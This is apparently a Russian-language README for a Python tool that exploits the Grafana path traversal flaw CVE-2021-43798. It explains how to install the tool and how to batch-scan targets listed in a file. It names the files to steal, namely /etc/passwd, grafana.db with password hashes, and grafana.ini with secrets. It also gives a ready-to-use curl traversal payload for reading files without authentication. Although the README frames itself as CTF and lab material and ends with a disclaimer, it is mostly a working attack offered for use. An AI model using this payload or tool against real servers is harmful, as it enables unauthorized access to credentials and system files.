
📂 Grafana LFI Exploit (CVE-2021-43798). Автоматизированное извлечение учетных данных и конфигурации. 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
Скрипт автоматизации на Python 3 для эксплуатации уязвимости Local File Inclusion (LFI) в Grafana (версии с 8.0.0 по 8.3.0). Этот эксплойт позволяет выполнить обход каталогов для чтения конфиденциальных файлов операционной системы без аутентификации. ✨ Особенности
Совместимость с Python 3.10+: Исправлено для работы с современными версиями Python (исправление collections.Mapping).
Пакетное сканирование: Возможность обработки нескольких целей с помощью файла targets.txt.
Расшифровка данных: Включает модули для работы с сессиями и зашифрованными данными Grafana.
Оптимизирован для CTF: Чистый и прямой вывод, идеально подходит для лабораторий HackTheBox и TryHackMe.
🛠️ Требования и установка
Из-за зависимостей от старых библиотек рекомендуется установить следующие пакеты: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
Примечание: Если вы используете Python 3.10 или новее, скрипт включает автоматический патч для совместимости с collections.abc.
🚀 Использование
Настройка целей: Добавьте URL-адреса (с портом) в файл targets.txt.
Bash
echo "http://10.129.234.47:3000" > targets.txt
Запустите эксплойт:
Bash
python3 exploit.py
🎯 Цели для чтения (LFI)
После запуска вы можете попытаться прочитать критические файлы, такие как:
/etc/passwd (Пользователи системы)
/var/lib/grafana/grafana.db (База данных с хэшами пользователей)
/etc/grafana/grafana.ini (Конфигурация и секреты)
💡 Альтернативный метод (вручную)
Если вы предпочитаете не использовать скрипт, вы можете напрямую воспользоваться LFI через curl: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ Отказ от ответственности
Этот репозиторий создан исключительно в образовательных целях и для использования в контролируемых средах (CTF, лаборатории). Автор не несет ответственности за неправомерное использование данного инструмента. 🏷️ Topics (Теги)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal